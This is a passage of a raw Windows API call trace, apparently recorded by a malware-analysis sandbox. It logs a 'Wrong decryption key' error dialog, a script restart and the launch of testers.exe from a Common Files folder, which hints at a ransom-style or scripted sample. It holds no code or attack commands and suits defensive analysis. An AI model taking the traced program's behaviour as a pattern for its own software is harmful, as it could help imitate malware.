(HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53140 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0250.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53140 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0250.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.225] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0250.453] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.453] NtdllDialogWndProc_W () returned 0x1 [0250.454] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.455] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.455] NtdllDialogWndProc_W () returned 0x0 [0250.460] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.460] GetWindowLongW (hWnd=0x30150, nIndex=-20) returned 256 [0250.460] NtdllDialogWndProc_W () returned 0x1 [0250.460] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.460] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.460] GetClientRect (in: hWnd=0x30150, lpRect=0x8bf280 | out: lpRect=0x8bf280) returned 1 [0250.460] GetCursorPos (in: lpPoint=0x8bf290 | out: lpPoint=0x8bf290*(x=875, y=503)) returned 1 [0250.460] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf290 | out: lpPoint=0x8bf290) returned 1 [0250.460] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0250.460] SetCursor (hCursor=0x10003) returned 0x10007 [0250.460] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.460] NtdllDialogWndProc_W () returned 0x0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] NtdllDialogWndProc_W () returned 0x1 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.461] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] NtdllDialogWndProc_W () returned 0x0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.461] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.461] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.461] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.462] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.462] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.462] NtdllDialogWndProc_W () returned 0x0 [0250.462] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.462] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.462] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.462] NtdllDialogWndProc_W () returned 0x0 [0250.490] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.490] GetWindowLongW (hWnd=0x30150, nIndex=-20) returned 256 [0250.490] NtdllDialogWndProc_W () returned 0x1 [0250.490] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.490] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.490] GetClientRect (in: hWnd=0x30150, lpRect=0x8bf280 | out: lpRect=0x8bf280) returned 1 [0250.491] GetCursorPos (in: lpPoint=0x8bf290 | out: lpPoint=0x8bf290*(x=875, y=503)) returned 1 [0250.491] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf290 | out: lpPoint=0x8bf290) returned 1 [0250.491] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0250.491] SetCursor (hCursor=0x10003) returned 0x10003 [0250.491] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.491] NtdllDialogWndProc_W () returned 0x0 [0250.491] GetForegroundWindow () returned 0x2016c [0250.491] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 9172760 [0250.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe766e0 [0250.492] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53140 [0250.492] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8bebd0) returned 1 [0250.549] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe766e0 | out: hHeap=0xbe0000) returned 1 [0250.549] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.549] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0250.549] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0250.553] GetForegroundWindow () returned 0x2016c [0250.553] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 9172760 [0250.598] GetForegroundWindow () returned 0x2016c [0250.598] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 9172760 [0250.651] GetForegroundWindow () returned 0x2016c [0250.651] GetWindowLongW (hWnd=0x2016c, nIndex=-21) returned 9172760 [0250.696] GetForegroundWindow () returned 0x20174 [0250.696] GetWindowLongW (hWnd=0x20174, nIndex=-21) returned 0 [0250.754] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.754] NtdllDialogWndProc_W () returned 0x0 [0250.754] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.754] NtdllDialogWndProc_W () returned 0x0 [0250.755] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.755] NtdllDialogWndProc_W () returned 0x0 [0250.755] NtdllDefWindowProc_W () returned 0x0 [0250.755] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.755] NtdllDialogWndProc_W () returned 0x1 [0250.756] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.756] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.756] NtdllDialogWndProc_W () returned 0x0 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c10 | out: hHeap=0xbe0000) returned 1 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6498 | out: hHeap=0xbe0000) returned 1 [0250.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.772] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.772] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.772] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.772] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.772] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.772] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.772] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.772] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.772] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.772] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.772] GetWindowLongW (hWnd=0x30150, nIndex=-20) returned 256 [0250.772] NtdllDialogWndProc_W () returned 0x1 [0250.773] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.773] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.773] GetClientRect (in: hWnd=0x30150, lpRect=0x8bf650 | out: lpRect=0x8bf650) returned 1 [0250.773] GetCursorPos (in: lpPoint=0x8bf660 | out: lpPoint=0x8bf660*(x=778, y=503)) returned 1 [0250.773] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf660 | out: lpPoint=0x8bf660) returned 1 [0250.773] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0250.773] SetCursor (hCursor=0x10003) returned 0x10003 [0250.773] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.773] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.773] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.773] NtdllDialogWndProc_W () returned 0x0 [0250.773] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.773] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.773] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.774] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.774] NtdllDialogWndProc_W () returned 0x1 [0250.774] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.774] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.774] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.790] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.790] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.790] NtdllDialogWndProc_W () returned 0x0 [0250.790] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.790] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.790] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.790] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.790] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.791] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.791] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.791] NtdllDialogWndProc_W () returned 0x0 [0250.791] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.791] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.791] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.791] NtdllDialogWndProc_W () returned 0x0 [0250.792] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.792] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.792] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.792] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.792] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.792] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.792] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.792] GetForegroundWindow () returned 0x30150 [0250.792] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.792] GetCursorPos (in: lpPoint=0x8bf740 | out: lpPoint=0x8bf740*(x=778, y=503)) returned 1 [0250.792] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf740 | out: lpPoint=0x8bf740) returned 1 [0250.792] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xc37a88 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53140 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53150 [0250.793] GetAsyncKeyState (vKey=1) returned 1 [0250.793] GetAsyncKeyState (vKey=2) returned 0 [0250.793] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53170 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.793] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0250.793] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.793] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8808 [0250.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01970 [0250.793] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53170 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe766e0 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53180 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe766e0 | out: hHeap=0xbe0000) returned 1 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53180 | out: hHeap=0xbe0000) returned 1 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53180 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ef0 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53180 | out: hHeap=0xbe0000) returned 1 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74d20 [0250.794] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53170 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0250.794] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x42) returned 0xe11c88 [0250.794] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0250.795] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2a) returned 0xe72c60 [0250.795] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xe72c60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0250.795] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x8bf550*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8bf518 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x8bf518*(hProcess=0x618, hThread=0x5e4, dwProcessId=0x778, dwThreadId=0x2ac)) returned 1 [0250.801] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe11c88 | out: hHeap=0xbe0000) returned 1 [0250.801] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c60 | out: hHeap=0xbe0000) returned 1 [0250.801] CloseHandle (hObject=0x5e4) returned 1 [0250.801] CloseHandle (hObject=0x618) returned 1 [0250.801] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c10 | out: hHeap=0xbe0000) returned 1 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.802] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe74d20 | out: hHeap=0xbe0000) returned 1 [0250.802] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01970 | out: hHeap=0xbe0000) returned 1 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0250.802] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53170 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d940 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53180 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.802] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53170 [0250.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dbc0 [0250.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0250.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dad0 [0250.803] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.803] LockWindowUpdate (hWndLock=0x0) returned 0 [0250.803] DestroyWindow (hWnd=0x5014a) returned 1 [0250.803] NtdllDefWindowProc_W () returned 0x0 [0250.804] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0250.804] Shell_NotifyIconW (dwMessage=0x2, lpData=0x8bf320) returned 1 [0250.830] DestroyWindow (hWnd=0x30150) returned 1 [0250.830] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.830] NtdllDialogWndProc_W () returned 0x0 [0250.831] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.831] NtdllDialogWndProc_W () returned 0x0 [0250.871] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.871] NtdllDialogWndProc_W () returned 0x0 [0250.887] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.887] NtdllDialogWndProc_W () returned 0x1 [0250.889] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.889] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.889] NtdllDialogWndProc_W () returned 0x0 [0250.890] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.890] NtdllDialogWndProc_W () returned 0x0 [0250.890] NtdllDefWindowProc_W () returned 0x0 [0250.890] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.890] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.890] InvalidateRect (hWnd=0x30150, lpRect=0x0, bErase=1) returned 1 [0250.890] DestroyAcceleratorTable (hAccel=0x60181) returned 1 [0250.890] DeleteObject (ho=0x850a01e1) returned 1 [0250.890] DestroyWindow (hWnd=0x3014e) returned 1 [0250.891] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.891] NtdllDialogWndProc_W () returned 0x0 [0250.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3ff0 | out: hHeap=0xbe0000) returned 1 [0250.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52630 | out: hHeap=0xbe0000) returned 1 [0250.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3fd8 | out: hHeap=0xbe0000) returned 1 [0250.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52620 | out: hHeap=0xbe0000) returned 1 [0250.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3db0 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52500 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc271f8 | out: hHeap=0xbe0000) returned 1 [0250.892] DestroyWindow (hWnd=0x20168) returned 1 [0250.892] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.892] NtdllDialogWndProc_W () returned 0x0 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4050 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52690 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4038 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52680 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4020 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52670 | out: hHeap=0xbe0000) returned 1 [0250.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd11d18 | out: hHeap=0xbe0000) returned 1 [0250.892] DeleteObject (ho=0x440a01d6) returned 1 [0250.892] DestroyWindow (hWnd=0x2016a) returned 1 [0250.893] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.893] NtdllDialogWndProc_W () returned 0x0 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0250.893] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe5d130 | out: hHeap=0xbe0000) returned 1 [0250.893] DeleteObject (ho=0xd0a01cf) returned 1 [0250.893] DestroyWindow (hWnd=0x2015e) returned 1 [0250.893] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.893] NtdllDialogWndProc_W () returned 0x0 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bc8 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526b0 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a60 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0250.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd26e98 | out: hHeap=0xbe0000) returned 1 [0250.894] DeleteObject (ho=0x590a0617) returned 1 [0250.894] DestroyWindow (hWnd=0x2010a) returned 1 [0250.894] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.894] NtdllDialogWndProc_W () returned 0x0 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b98 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b80 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0250.895] HeapFree (in: hHeap=0xbe0000, 